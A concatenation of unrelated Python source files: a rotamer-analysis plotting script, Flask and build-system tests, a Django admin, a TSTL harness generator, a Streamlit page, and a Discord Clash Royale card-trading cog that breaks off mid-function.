######################################################################## # Argument Parsing parser = argparse.ArgumentParser() parser.add_argument("-a", "--file_a", dest="filename_a", help='Filename of unrefined pkl file') parser.add_argument("-b", "--file_b", dest="filename_b", help='Filename of refined pkl file') parser.add_argument("-o", dest="offset", type=int, default=0) parser.add_argument("-t", "--threshold", dest="threshold", help='Threshold cutoff for rho density', nargs='?', type = float, default=0) parser.add_argument("-w", "--extension_around_center", dest = "extension", help='Number of amino acids to extend around the center in both directions. \ The total window will therefore be twice this number plus one for the center.' , nargs="?", type=int, default=10) parser.add_argument("--percent_passing_cutoff", dest = "thresholded_cutoff", help='Minimum %% passing threshold to flag as a bad region...' , nargs="?", type=float, default=0.8) parser.add_argument("--rotamericity_cutoff", dest = "rotamer_cutoff", help='Maximum rotamericity to be flagged.' , nargs="?", type=float, default=0.5) parser.add_argument("--display", dest = "graph", action='store_true') parser.add_argument("--no_save", dest = "save", action='store_false') parser.add_argument("-r", "--rel", dest = "rel", action='store_true') parser.set_defaults(rel=False, graph=False, save=True) args = parser.parse_args() class RingerDict(object): '''Ringerdict: A dictionary accessible form of the output of ringer''' def __init__(self, resultlist, offset): self.dict = {} for residue in resultlist: if residue.resname in Residue_codes: residue.resid = int(residue.resid)+offset self.add_residue(residue) def add_residue(self, residue): if residue.chain_id not in self.dict.keys(): self.dict[residue.chain_id] = {} if 1 in residue._angles.keys(): self.dict[residue.chain_id][residue.resid] = residue._angles[1] def get_peak(self, chain_id, residue_id): if (chain_id in self.dict.keys() and residue_id in self.dict[chain_id].keys()): return self.dict[chain_id][residue_id] else: return None def get_chains(self): return self.dict.keys() def get_residues(self, chain_id): return sorted(self.dict[chain_id].keys()) def ranges(p): q = sorted(p) i = 0 for j in xrange(1,len(q)): if q[j] > 1+q[j-1]: yield (q[i],q[j-1]) i = j yield (q[i], q[-1]) def identify_regions(results): for chain, chain_out in results.iteritems(): outliers = [] print "For Chain %s:" % chain for k in chain_out: if (np.divide(k[2],k[1]) > args.thresholded_cutoff) and (np.divide(k[3],k[2]) < args.rotamer_cutoff): for i in range(k[0]-args.extension, k[0]+args.extension): outliers.append(i) if len(outliers) > 0: print list(ranges(outliers)) print "" else: print "No outliers at this threshold \n" def main(): ringer_results = easy_pickle.load(args.filename_a) hierarchy = RingerDict(ringer_results, 0) results_a = {} for chain in hierarchy.get_chains(): results_a[chain] = [] # Results will be a list of tuples of the form residue number, # number checked in window, number passing threshold in window, # number deviating in window. for i in hierarchy.get_residues(chain): total_n = 0.0 threshold_n = 0.0 # threshold_deviation = 0 n_deviate = 0.0 for j in range(-args.extension, args.extension+1): chi = hierarchy.get_peak(chain, int(i)+j) if chi: total_n += 1 if args.rel: if chi.relrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 else: if chi.peakrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 results_a[chain].append((i, total_n, threshold_n, n_deviate)) ringer_results = easy_pickle.load(args.filename_b) hierarchy = RingerDict(ringer_results, args.offset) results_b = {} for chain in hierarchy.get_chains(): results_b[chain] = [] # Results will be a list of tuples of the form residue number, # number checked in window, number passing threshold in window, # number deviating in window. for i in hierarchy.get_residues(chain): total_n = 0.0 threshold_n = 0.0 # threshold_deviation = 0 n_deviate = 0.0 for j in range(-args.extension, args.extension+1): chi = hierarchy.get_peak(chain, int(i)+j) if chi: total_n += 1 if args.rel: if chi.relrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 else: if chi.peakrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 results_b[chain].append((i, total_n, threshold_n, n_deviate)) # identify_regions(results) if args.graph or args.save: plot_results(results_a, results_b) def plot_results(results_a,results_b): for chain in results_a.keys(): fig, ax = plt.subplots() # plt.title("Rolling window - Chain %s" % chain) x_a = [k[0] for k in results_a[chain]] x_b = [k[0] for k in results_b[chain]] y_a = [np.divide(k[3],k[2]) for k in results_a[chain]] y_b = [np.divide(k[3],k[2]) for k in results_b[chain]] # plt.plot(x, y_1, 'b-', label = "Percent passing threshold",linewidth=3.0, alpha=0.7) plt.plot(x_a, y_a, label = "Unrefined",linewidth=3.0, alpha=0.9) plt.plot(x_b, y_b, label = "Refined",linewidth=3.0, alpha=0.9, color='#60BD68') # plt.xlim(381,695) plt.xlabel("Center Residue of 21-Residue Window", labelpad=10) plt.ylabel("Fraction Rotameric Residues", labelpad=10) plt.ylim(0,1) plt.legend(loc=4) ax.yaxis.set_ticks_position('left') # this one is optional but I still recommend it... ax.xaxis.set_ticks_position('bottom') if args.graph: fig.show() if args.save: output = args.filename_a[:-4] + "_" + chain + "_rolling.png" fig.savefig(output) if __name__ == "__main__": main() tests/test_app.py ''' test_app.py ''' from flask import url_for from tests.base import Base class TestApp(Base): def test_generic_404(self): res = self.client.get('/foo/bar') self.assertEqual(res.status_code, 404) self.assertEqual(res.json['status'], 'NOT_FOUND') def test_health(self): res = self.client.get(url_for('health')) self.assertEqual(res.status_code, 200) self.assertEqual( res.json, { 'status': 'OK', } ) def test_docs(self): res = self.client.get('/docs/') self.assertEqual(res.status_code, 200) thomasrockhu/bfg9000test/integration/test_package.py import os.path from . import * is_mingw = (env.host_platform.family == 'windows' and env.builder('c++').flavor == 'cc') class TestPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__(os.path.join(examples_dir, '04_package'), *args, **kwargs) def test_build(self): self.build() # XXX: This fails on MinGW (not sure why)... if not is_mingw: self.assertOutput([executable('program')], '') class TestSystemPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__(os.path.join(examples_dir, '04_package'), extra_env={'PKG_CONFIG': 'nonexist'}, *args, **kwargs) def test_build(self): self.build() # XXX: This fails on MinGW (not sure why)... if not is_mingw: self.assertOutput([executable('program')], '') @skip_if(is_mingw, 'xfail on mingw') class TestBoostPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('boost', *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program'), '--hello'], 'Hello, world!\n') class TestOpenGLPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('opengl', *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program')], '') class TestOpenGLSystemPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('opengl', extra_env={'PKG_CONFIG': 'nonexist'}, *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program')], '') youngqqcn/QBlockChainNotes from django.contrib import admin from finance.models import * from import_export import resources from import_export.admin import ImportExportModelAdmin, ImportExportActionModelAdmin class ProxyResource(resources.ModelResource): class Meta: model = Record # Register your models here. @admin.register(Record) # class RecordAdmin(admin.ModelAdmin): # class RecordAdmin(ImportExportModelAdmin): class RecordAdmin(ImportExportActionModelAdmin): resource_class = ProxyResource list_display = ('id', 'name', 'type', 'money', 'create_date') list_per_page = 10 import pytest import os import collect def test__module_name_from_path(): test = "/path/to/code/bubblewrap/tests/test_collect.py" expected = "test_collect" assert collect._module_name_from_path(test) == expected def test_filter_tests(): trial = [ "/path/to/code/bubblewrap/collect.py", "/path/to/code/bubblewrap/cli.py", "/path/to/code/bubblewrap/tests/test_collect.py", "/path/to/code/bubblewrap/utils/log.py", "/path/to/code/bubblewrap/tests/collect_test.py", "/path/to/code/bubblewrap/tests/collect_tests.py", ] trial = collect.filter_tests(trial) expected = [ "/path/to/code/bubblewrap/tests/collect_test.py", "/path/to/code/bubblewrap/tests/test_collect.py", ] # order doesn't matter so we might as well sort to make the test validate it's # at least got the same stuff assert sorted(trial) == sorted(expected) def test_ImportParser_find_imports(): root = os.getcwd() example_stable = os.path.join(root, "examples", "stable") test_path = f"{root}/examples/stable/tests/test_banana.py" exclude = [".git", "__pycache__", "__venv__", "env"] all_files = collect.walk_tree(example_stable, exclude) tests = collect.filter_tests(all_files) modules = collect.convert_app_paths_to_modules(set(all_files) - set(tests)) output = collect.ImportParser(tests=tests, app_modules=modules, module_map={})._find_imports( test_path ) expected = ( {"banana", "amazing", "blue"}, f"{root}/examples/stable/tests/test_banana.py", ) assert output == expected def test_ImportParser_submodule_name_module(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "lizard" ) expected = "lizard" assert output == expected def test_ImportParser_submodule_name_submodule(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "green.lizard" ) expected = "lizard" assert output == expected def test_ImportParser_submodule_name_subsubmodule(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "super.green.lizard" ) expected = "lizard" assert output == expected def test_example_stable_end_to_end(): root = os.getcwd() example_stable = os.path.join(root, "examples", "stable") expected = { "banana": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_amazing.py", ], "blue": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_apple.py", ], "amazing": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_amazing.py", f"{root}/examples/stable/tests/test_apple.py", ], "script": [ f"{root}/examples/stable/tests/test_script.py", f"{root}/examples/stable/tests/test_apple.py", ], "apple": [f"{root}/examples/stable/tests/test_apple.py"], } # lifted from defaults in script invocation wrapper exclude = [".git", "__pycache__", "__venv__", "env"] tests = collect.collect_tests(example_stable, exclude) output = collect.map_tests_to_modules(example_stable, exclude, tests) assert sorted(output) == sorted(expected) deprecated/obsolete/src/tstl.py import sys import argparse import os import re from collections import namedtuple import pkg_resources def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('-a', '--act', type=str, default=None, help='Path to the .act file.') parser.add_argument('-t', '--target', type=str, default="sut.py", help='Name of the file containing the generated harness core (default = sut.py.') parser.add_argument('-c', '--classname', type=str, default='t', help='Name of the class representing the SUT (default=t)') parser.add_argument('-n', '--nocover', action='store_true', help='Disable generating coverage collection support.') parser.add_argument('-r', '--coverreload', action='store_true', help='Generate coverage for module reload behavior.') parser.add_argument('-i', '--coverinit', action='store_true', help='Generate coverage for SUT initialization behavior.') parsed_args = parser.parse_args(sys.argv[1:]) return (parsed_args, parser) def make_config(pargs, parser): """ Process the raw arguments, returning a namedtuple object holding the entire configuration, if everything parses correctly. """ pdict = pargs.__dict__ if pargs.act is None: parser.print_help() raise ValueError('The .act file is not specified.') elif not os.path.exists(pargs.act): parser.print_help() raise ValueError('Cannot locate the .act file at path={}'.format(pargs.target)) if pargs.target is None: parser.print_help() raise ValueError('The target file is not specified.') # create a namedtuple object for fast attribute lookup key_list = pdict.keys() arg_list = [pdict[k] for k in key_list] Config = namedtuple('Config', key_list) nt_config = Config(*arg_list) return nt_config parsed_args, parser = parse_args() config = make_config(parsed_args, parser) print('Generating harness core using config={}'.format(config)) outf = open(config.target,'w') def parse_import_line(line): raw = line.split('import ') assert len(raw) == 2, 'import statement error in line --> {}'.format(line) # from X import Y # from X import Y as Z # import X.Y # import X.Y as Z, A.B as C raw = raw[1] # check for multiple imports subimports = [raw] if ', ' in raw: subimports = raw.split(', ') assert len(subimports) > 0 # check for aliasing mod_names = [] for si in subimports: name = None if 'as' in si: ts = si.split(' as ') assert len(ts) == 2, 'Parse error on "as" during import of {}'.format(name) name = ts[1].rstrip() # remove the trailing newline or whitespace if any else: name = si.rstrip() mod_names.append(name) assert len(mod_names) > 0 return mod_names # Handle raw python, imports outf.write("import copy\n") outf.write("import traceback\n") outf.write("import re\n") outf.write("import sys\n") if not config.nocover: outf.write("import coverage\n") code = [] import_modules = [] # we will call reload on these during restart inside_literal_block = False inside_function = False function_code = [] baseIndent = " " with open(config.act, 'r') as fp: for l in fp: if l[-1] != "\n": l = l + "\n" if l[0] == "#": continue # COMMENT if re.match("<@", l): inside_literal_block=True continue if re.match("@>", l): inside_literal_block=False continue if l[0] == "@" or inside_literal_block: if l[0] == "@": l = l[1:] if l.find("def guarded") == 0: # guarded function, append the speculation argument and continue if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") for fl in function_code: outf.write(fl) outf.write(l.replace("):",", SPECULATIVE_CALL = False):")) inside_function = True anyPRE = False function_code = [] elif l.find("def ") == 0: if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") for fl in function_code: outf.write(fl) outf.write(l) inside_function = True anyPRE = False function_code = [] elif l.find("import") == 0: outf.write(l) # import, so set up reloading module_names = parse_import_line(l) import_modules += module_names elif inside_function: if l.find("%COMMIT%") != -1: # commit point in a guarded function definition function_code.append(l.replace("%COMMIT%","if SPECULATIVE_CALL: return True")) continue m = re.match(r".*PRE\[(\S+)\].*",l) while m: anyPRE = True pre_expr = m.groups()[0] spre_expr = "'''" + pre_expr + "'''" l = l.replace("PRE[" + pre_expr + "]", "__pre[" + spre_expr + "]", 1) function_code = [(baseIndent + "__pre[" + spre_expr + "] = " + pre_expr + "\n")] + function_code m = re.match(r".*PRE\[(\S+)\].*",l) function_code.append(l) else: outf.write(l) elif l[0] == "*": # include action multiple times spos = l.find(" ") times = int(l[1:spos]) for n in xrange(0,times): code.append(l[spos:]) else: code.append(l) if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") for fl in function_code: outf.write(fl) assert len(code) > 0, 'No non-comment lines found in .act file' # Build up the pool, initialization values poolPrefix = "self.p_" sourceSet = [] poolSet = {} initSet = [] propSet = [] refSet = [] compareSet = [] featureSet = [] logSet = [] referenceMap = {} newCode = [] for c in code: cs = c.split() if cs == []: continue elif cs[0] == "init:": initSet.append(c.replace("init: ","")) elif cs[0] == "log:": logSet.append(c.replace("log: ","")) elif cs[0] == "property:": propSet.append(c.replace("property: ","")) elif cs[0] == "pool:": poolSet[cs[1]] = int(cs[2]) if (len(cs)>3) and (cs[3] == "REF"): refSet.append(cs[1]) poolSet[cs[1]+"_REF"] = int(cs[2]) elif cs[0] == "reference:": baseRefSplit = c.split("reference: ")[1] rs = baseRefSplit.split(" ==> ") referenceMap[rs[0]] = rs[1][:-1] elif cs[0] == "feature:": featureSet.append(cs[1]) elif cs[0] == "compare:": compareSet.append(cs[1]) elif cs[0] == "source:": sourceSet.append(cs[1]) else: newCode.append(c) code = newCode # Expand pool references def expandPool(original): newVersion = [] for c in original: for p in poolSet: pexpr = p + " [%[0.." + str(poolSet[p]-1) + "]%]" c = c.replace(p, pexpr) newVersion.append(c) return newVersion code = expandPool(code) propSet = expandPool(propSet) initSet = expandPool(initSet) logSet = expandPool(logSet) # Expand all range expressions def expandRange(original): current = original anyChanged = True while anyChanged: anyChanged = False newVersion = [] for c in current: if "%[" in c: anyChanged = True lpos = c.find("%[") dotpos = c.find("..",lpos) endpos = c.find("]%",dotpos) low = int(c[lpos+2:dotpos]) high = int(c[dotpos+2:endpos]) rexp = c[lpos:endpos+2] for x in xrange(low,high+1): newVersion.append(c.replace(rexp, str(x), 1)) else: newVersion.append(c) current = newVersion return newVersion code = expandRange(code) propSet = expandRange(propSet) initSet = expandRange(initSet) logSet = expandRange(logSet) # Finally go ahead and directly reference pools in preds and initalizers newProps = [] for c in propSet: newProps.append((c,[])) propSet = newProps for p in poolSet: newProps = [] for (c,u) in propSet: uses = u found = c.find(p) while (found != -1): use = c[found:c.find("]", found)+1] use = use.replace(p + " ", poolPrefix + p.replace("%","")) uses.append(use) found = c.find(p,found+1) newProps.append((c.replace(p + " ", poolPrefix + p.replace("%","")),uses)) propSet = newProps for p in poolSet: newInits = [] for c in initSet: newInits.append(c.replace(p + " ", poolPrefix + p.replace("%",""))) initSet = newInits for p in poolSet: newLogs = [] for c in logSet: newLogs.append(c.replace(p + " ", poolPrefix + p.replace("%",""))) logSet = newLogs newLogs = [] for l in logSet: refl = l for p in poolSet: if p in refSet: pRaw = poolPrefix + p.replace("%","") refl = l.replace(pRaw,pRaw+"_REF") if refl != l: for base in referenceMap: refl = re.sub(base,referenceMap[base],refl) newLogs.append(l) if refl != l: newLogs.append(refl) logSet = newLogs # Now generate the action and guard code outf.write("class " + config.classname + "(object):\n") genCode = [] actCount = 0 def genAct(): global actCount s = "act" + str(actCount) actCount += 1 return s guardCount = 0 def genGuard(): global guardCount s = "guard" + str(guardCount) guardCount += 1 return s actDefs = [] for corig in code: act = genAct() guard = genGuard() guardCode = "True" guardConds = [] changes = [] okExcepts = "" if corig[0] == "{": c = corig[corig.find("}")+1:] while c[0] == " ": c = c[1:] for e in corig[1:corig.find("}")].split(","): okExcepts += e + "," okExcepts = okExcepts[:-1] else: c = corig newC = c eqPos = c.find(":=") if eqPos == -1: eqPos = 0 lhsUse = [] rhsUse = [] for p in poolSet: newC = newC.replace(p + " ", poolPrefix + p.replace("%","")) newC = newC.replace(p, poolPrefix + p.replace("%","")) plhs = [] prhs = [] found = c.find(p) while (found != -1): use = c[found:c.find("]", found)+1] twiddle = (found > 0) and (c[found-1]=='~') if (found >= eqPos): prhs.append((use,twiddle)) else: plhs.append(use) found = c.find(p,found+1) for assign in plhs: g = assign g = g.replace("%","") g = poolPrefix + g g = g.replace(" ","") gval = g g = g.replace("[", "_used[") gguard = "((" + g + ") or (" + gval + " == None))" guardConds.append(gguard) changes.append(g + "=False") for (used,twiddle) in prhs: g = used g = g.replace("%","") g = poolPrefix + g g = g.replace(" ","") if (not twiddle): changes.append(g.replace("[","_used[") + "=True") g += " != None" guardConds.append(g) newC = newC.replace(":=","=") newC = newC.replace("~"+poolPrefix,poolPrefix) refC = newC for p in poolSet: if p in refSet: pRaw = poolPrefix + p.replace("%","") refC = refC.replace(pRaw,pRaw+"_REF") for base in referenceMap: refC = re.sub(base,referenceMap[base],refC) comparing = False for comp in compareSet: if re.match(".*" + comp + ".*", newC): if refC != newC: newC = "__result = " + newC refC = "__result_REF = " + refC comparing = True genCode.append("def " + act + "(self):\n") if logSet != []: genCode.append(baseIndent + "self.log()\n") if not config.nocover: genCode.append(baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + "self.__cov.start()\n") genCode.append(baseIndent + "try:\n") genCode.append(baseIndent + baseIndent + newC + "\n") if okExcepts != "": genCode.append(baseIndent + "except (" + okExcepts + "):\n") genCode.append(baseIndent + baseIndent + "pass\n") genCode.append(baseIndent + "finally:\n") genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.stop()\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__updateCov()\n") else: genCode.append(baseIndent + newC + "\n") if refC != newC: genCode.append(baseIndent + refC + "\n") if comparing: genCode.append(baseIndent + "assert __result == __result_REF, \" (%s) == (%s) \" % (__result, __result_REF)\n") for ch in changes: genCode.append(baseIndent + ch + "\n") for g in guardConds: guardCode += " and (" + g + ")" if newC.find("guarded") == 0: guardCode += " and (" + newC.replace(")\n",",True))") genCode.append("def " + guard + "(self):\n") genCode.append(baseIndent + "return " + guardCode + "\n") d = "self.__actions.append((" d += "'''" + newC[:-1] +" '''," d += "self." + guard + "," d += "self." + act + "))\n" actDefs.append(d) d = "self.__names[" + "'''" + newC[:-1] + " '''] = (" d += "'''" + newC[:-1] + " '''," d += "self." + guard + "," d += "self." + act + ")\n" actDefs.append(d) def genInitialization(): for p in poolSet: s = baseIndent s += poolPrefix + p.replace("%","") + " = {}" genCode.append(s + "\n") s = baseIndent s += poolPrefix + p.replace("%","") + "_used = {}" genCode.append(s + "\n") for x in xrange(0,poolSet[p]+1): s = baseIndent s += poolPrefix + p.replace("%","") + "[" + str(x) + "] = None" genCode.append(s + "\n") s = baseIndent s += poolPrefix + p.replace("%","") + "_used[" + str(x) + "] = True" genCode.append(s + "\n") if (not config.nocover) and config.coverinit: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.start()\n") for i in initSet: s = baseIndent s += i genCode.append(s) if (not config.nocover) and config.coverinit: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.stop()\n") genCode.append(baseIndent + "if self.__collectCov: self.__updateCov()\n") genCode.append("def __init__(self):\n") genCode.append(baseIndent + "self.__features = []\n") for f in featureSet: genCode.append(baseIndent + 'self.__features.append(r"' + f + '")\n') if not config.nocover: covc = baseIndent + "self.__cov = coverage.coverage(branch=True, source=[" for s in sourceSet: covc += '"' + s + '",' if len(sourceSet) > 0: covc = covc[:-1] genCode.append(covc + "])\n") genCode.append(baseIndent + "self.__collectCov = True\n") genCode.append(baseIndent + "self.__allBranches = set()\n") genCode.append(baseIndent + "self.__allStatements = set()\n") genCode.append(baseIndent + "self.__newBranches = set()\n") genCode.append(baseIndent + "self.__newStatements = set()\n") genCode.append(baseIndent + "self.__currBranches = set()\n") genCode.append(baseIndent + "self.__currStatements = set()\n") genCode.append(baseIndent + "self.__newCurrBranches = set()\n") genCode.append(baseIndent + "self.__newCurrStatements = set()\n") genInitialization() genCode.append(baseIndent + "self.__actions = []\n") genCode.append(baseIndent + "self.__names = {}\n") genCode.append(baseIndent + "self.__failure = None\n") genCode.append(baseIndent + "self.__log = None\n") genCode.append(baseIndent + "self.__logAction = self.logPrint\n") for d in actDefs: genCode.append(baseIndent + d + "\n") genCode.append(baseIndent + "self.__actions_backup = list(self.__actions)\n") genCode.append("def restart(self):\n") if not config.nocover: genCode.append(baseIndent + "self.__currBranches = set()\n") genCode.append(baseIndent + "self.__currStatements = set()\n") genCode.append(baseIndent + "self.__newCurrBranches = set()\n") genCode.append(baseIndent + "self.__newCurrStatements = set()\n") if config.coverreload: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.start()\n") for l in import_modules: s = baseIndent + 'reload({})\n'.format(l) genCode.append(s) if (not config.nocover) and config.coverreload: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.stop()\n") genCode.append(baseIndent + "if self.__collectCov: self.__updateCov()\n") genInitialization() genCode.append("def log(self):\n") if logSet != []: genCode.append(baseIndent + "if self.__log == None:\n") genCode.append(baseIndent + baseIndent + "return\n") for l in logSet: ls = l.split() try: level = int(ls[0]) lcode = l[l.find(ls[1]):] except ValueError: level = 0 lcode = l genCode.append(baseIndent + "if (self.__log == 'All') or (self.__log >= " + str(level) + "):\n") genCode.append(baseIndent + baseIndent + "try:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__logAction(" + '"""' + lcode[:-1] + '""",' + lcode[:-1] + ")\n") genCode.append(baseIndent + baseIndent + "except:\n") genCode.append(baseIndent + baseIndent + baseIndent + "pass\n") else: genCode.append(baseIndent + "pass\n") genCode.append("def state(self):\n") st = baseIndent + "return [ " for p in poolSet: st += "copy.deepcopy(" + poolPrefix + p.replace("%","") + ")," st += "copy.deepcopy(" + poolPrefix + p.replace("%","") + "_used)," st = st[:-1] genCode.append(st + "]\n") genCode.append("def backtrack(self,old):\n") n = 0 for p in poolSet: genCode.append(baseIndent + poolPrefix + p.replace("%","") + " = copy.deepcopy(old[" + str(n) + "])\n") n += 1 genCode.append(baseIndent + poolPrefix + p.replace("%","") + "_used = copy.deepcopy(old[" + str(n) + "])\n") n += 1 if len(poolSet) == 0: genCode.append(baseIndent + "pass\n") genCode.append("def check(self):\n") if propSet != []: genCode.append(baseIndent + "try:\n") if not config.nocover: genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.start()\n") for (p, u) in propSet: if u != []: pr = baseIndent + baseIndent + "if True" for use in u: pr += " and (" + use + " != None)" pr += ":\n" genCode.append(pr) genCode.append(baseIndent + baseIndent + baseIndent + "assert " + p + "\n") else: genCode.append (baseIndent + baseIndent + "assert " + p + "\n") genCode.append(baseIndent + "except:\n") genCode.append(baseIndent + baseIndent + "self.__failure = sys.exc_info()\n") genCode.append(baseIndent + baseIndent + "return False\n") if not config.nocover: genCode.append(baseIndent + "finally:\n") genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.stop()\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__updateCov()\n") genCode.append(baseIndent + "return True\n") for c in genCode: outf.write(baseIndent + c.replace("True and (","(")) for l in open("boilerplate.py"): outf.write(baseIndent + l) if not config.nocover: for l in open("boilerplate_cov.py"): outf.write(baseIndent + l) outf.close() 0 __author__ = '' from Main_Window_Handler import Main_Window_Handler about.py0 import streamlit as st def app(): st.write("# About") col1, col2, col3 = st.columns([5,2,5]) with col1: st.image("davide.jpg") st.write("### ") st.write("Ricercatore PostDoc all'Università SISSA di Trieste") st.write("Ideatore principale di concept, metriche e grafici") st.write("[Website](https://davidetorlo.it/), [Twitter](https://twitter.com/accdavlo)") with col3: st.image("fede_new.jpeg") st.write("### ") st.write("Ricercatore PostDoc all'Università Bocconi di Milano") st.write("Support alla realizzazione della webapp e deploy") st.write("[Website](https://federicobianchi.io/), [Twitter](https://twitter.com/federicobianchy)") duanegtr/legendv3-cogs import discord import os from redbot.core import Config from redbot.core import checks, commands from redbot.core.data_manager import bundled_data_path from redbot.core.utils import chat_formatting from json import load """This is a port of GR8's trade cog with minor modifications. Original cog: https://github.com/Gr8z/Legend-Cogs/tree/master/trade """ # Possible TODO's: # 1. Check if user has sufficient cards to give while searching # for possible traders # 2. Suggest necessary cards for trade give option based on levels. # Max levels can be donated. Also cards that are not used/upgraded # can also be given away. cards_filename = "cards.json" consts_filename = "constants.json" token_type = ["legendary", "epic", "rare", "common"] member_settings = { "want" : { "legendary" : [], "epic" : [], "rare" : [], "common" : [], }, "give" : { "legendary" : [], "epic" : [], "rare" : [], "common" : [], }, "token" : { "legendary" : False, "epic" : False, "rare" : False, "common" : False, }, } credits="Bot by Legend Gaming" credits_url = "https://cdn.discordapp.com/emojis/709796075581735012.gif?v=1" class Trade(commands.Cog): """Clash Royale Trading Helper""" def __init__(self, bot): self.bot = bot dir_path = bundled_data_path(self) file_path = os.path.join(dir_path, cards_filename) with open (file_path, 'r') as file: self.cards = load(file) file_path = os.path.join(dir_path, consts_filename) with open (file_path, 'r') as file: self.constants = load(file) self.database = Config.get_conf(self, identifier=7894561230, force_registration=True) self.database.register_member(**member_settings) # init card data self.cards_abbrev = {} for k, v in self.cards.items(): for value in v: self.cards_abbrev[value] = k self.cards_abbrev[k] = k async def cardToRarity(self, name): """Card name to rarity.""" for card in self.constants["cards"]: if name == card["name"]: return card["rarity"] return None async def saveCardWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card not in want[rarity]: want[rarity].append(card) async def removeCardWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card in want[rarity]: want[rarity].remove(card) async def saveCardGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: if card not in give[rarity]: give[rarity].append(card) async def removeCardGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: give[rarity].remove(card) async def cardInWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card in want[rarity]: return True else: return False async def cardInGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: if card in give[rarity]: return True else: return False async def saveToken(self, member, token_name): async with self.database.member(member).token() as token: token[token_name] = True async def removeToken(self, member, token_type): async with self.database.member(member).token() as token: token[token_type] = False async def searchTrades(self, card, guild): rarity = await self.cardToRarity(card) rarity = rarity.lower() trades = {} members = await self.database.all_members() if members: if guild in members: members = members[guild] for player in members: player_data = members[player] trades[player] = [False, False, False] if card in player_data['give'][rarity]: trades[player][0] = True if card in player_data['want'][rarity]: trades[player][1] = True if player_data['token'][rarity]: trades[player][2] = True return trades else: print("Hmm. No guild. That was not supposed to happen! ") return 0 else: return 0 async def sortTrades(self, server, author, trades): try: author_clan = author.display_name.split("|", 1)[1] except IndexError: author_clan = None token_trades = {} sorted1 = {} sorted2 = {} for player in trades: if player == author.id: continue try: member = server.get_member(player) clan = member.display_name.split("|", 1)[1] except AttributeError: continue except IndexError: clan = None author_clan = None if author_clan == clan: token_trades[player] = trades[player] else: sorted1[player] = trades[player] for player in sorted1: if trades[player][2]: token_trades[player] = trades[player] else: sorted2[player] = trades[player] return { **token_trades, **sorted2} @commands.group(pass_context = True, no_pm=True) async def trade(self, ctx): """ Clash Royale trade commands""" pass @trade.group(name="want") async def trade_want(self, ctx): """Add/Remove cards that you are looking for""" pass @trade_want.command(name="add") async def want_add(self, ctx, *, card): """Add card that you are looking for""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") if( await self.cardInGive(author, card) ): await ctx.send("Cannot add {} as it is present in give list.".format(card)) else: await self.saveCardWant(author, card) await ctx.send("You are now looking for {}".format(card)) @trade_want.command(name="remove") async def want_remove(self, ctx, *, card): """Remove card that you are no longer looking for""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") await self.removeCardWant(author, card) await ctx.send("You are no longer looking for {}".format(card)) @trade.group(name="give") async def trade_give(self, ctx): """Add/Remove cards that you would like to give away""" pass @trade_give.command(name="add") async def give_add(self, ctx, *, card): """Add card that you want to give away""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") if( await self.cardInWant(author, card) ): await ctx.send("Cannot add {} as it is present in want list.".format(card)) else: await self.saveCardGive(author, card) await ctx.send("You are now looking to donate {}".format(card)) @trade_give.command(name="remove") async def give_remove(self, ctx, *, card): """Remove card that you no longer want to give away""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") await self.removeCardGive(author, card) await ctx.send("You are no longer looking to give away {}".format(card)) @trade.command(pass_context=True, no_pm=True) async def search(self, ctx, *, card): """Search for trades""" author = ctx.message.author server = ctx.guild try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") trades = await self.searchTrades(card, ctx.guild.id) if(trades == 0): await ctx.send("No data available in the server") return 0 